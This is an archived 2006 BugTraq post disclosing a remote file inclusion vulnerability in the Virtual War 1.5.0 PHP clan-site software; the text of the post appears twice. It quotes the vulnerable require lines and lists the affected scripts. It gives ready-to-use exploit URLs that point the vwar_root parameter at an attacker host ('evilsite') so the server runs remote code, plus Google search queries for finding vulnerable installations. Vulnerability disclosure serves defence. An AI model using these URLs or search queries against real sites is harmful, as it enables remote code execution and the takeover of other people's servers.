BugTraq
Back to list
|
Post reply
Virtual War File İnclusion
Apr 08 2006 01:27PM
liz0 bsdmail com
Virtual War File inclusion
---------------------------------
Site:http://www.vwar.de/
Demo:http://www.vwar.de/demo/
---------------------------------------
File Ýnclusion
// get functions
$vwar_root = "./";
require ($vwar_root . "includes/functions_common.php");
require ($vwar_root . "includes/functions_front.php");
Vwar_root parameter File inclusion
Aut File
war.php,stats.php,news.php,joinus.php,challenge.php,calendar.php,member.
php,popup.php
and
all admin folder files
---------------------------------------
example
1)
http://victim.com/path/admin/admin.php?vwar_root=http://evilsite
2)(phpnuke module)
http://victim.com/path/modules/vwar/admin/admin.php?vwar_root=http://evi
lsite
-----------------------------------------
Credit:Liz0ziM
E-mail:liz0 (at) bsdmail (dot) com [email concealed]
Site:www.biyo.tk www.biyosecurity.be
-----------------------------------------
google:
"Powered by: Virtual War v1.5.0"
inurl:"modules.php?name=vwar"
-------------------------------------
Source:
http://www.blogcu.com/Liz0ziM/431925/
http://liz0zim.no-ip.org/vwar.txt
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
---------------------------------
Site:http://www.vwar.de/
Demo:http://www.vwar.de/demo/
---------------------------------------
File Ýnclusion
// get functions
$vwar_root = "./";
require ($vwar_root . "includes/functions_common.php");
require ($vwar_root . "includes/functions_front.php");
Vwar_root parameter File inclusion
Aut File
war.php,stats.php,news.php,joinus.php,challenge.php,calendar.php,member.
php,popup.php
and
all admin folder files
---------------------------------------
example
1)
http://victim.com/path/admin/admin.php?vwar_root=http://evilsite
2)(phpnuke module)
http://victim.com/path/modules/vwar/admin/admin.php?vwar_root=http://evi
lsite
-----------------------------------------
Credit:Liz0ziM
E-mail:liz0 (at) bsdmail (dot) com [email concealed]
Site:www.biyo.tk www.biyosecurity.be
-----------------------------------------
google:
"Powered by: Virtual War v1.5.0"
inurl:"modules.php?name=vwar"
-------------------------------------
Source:
http://www.blogcu.com/Liz0ziM/431925/
http://liz0zim.no-ip.org/vwar.txt
[ reply ]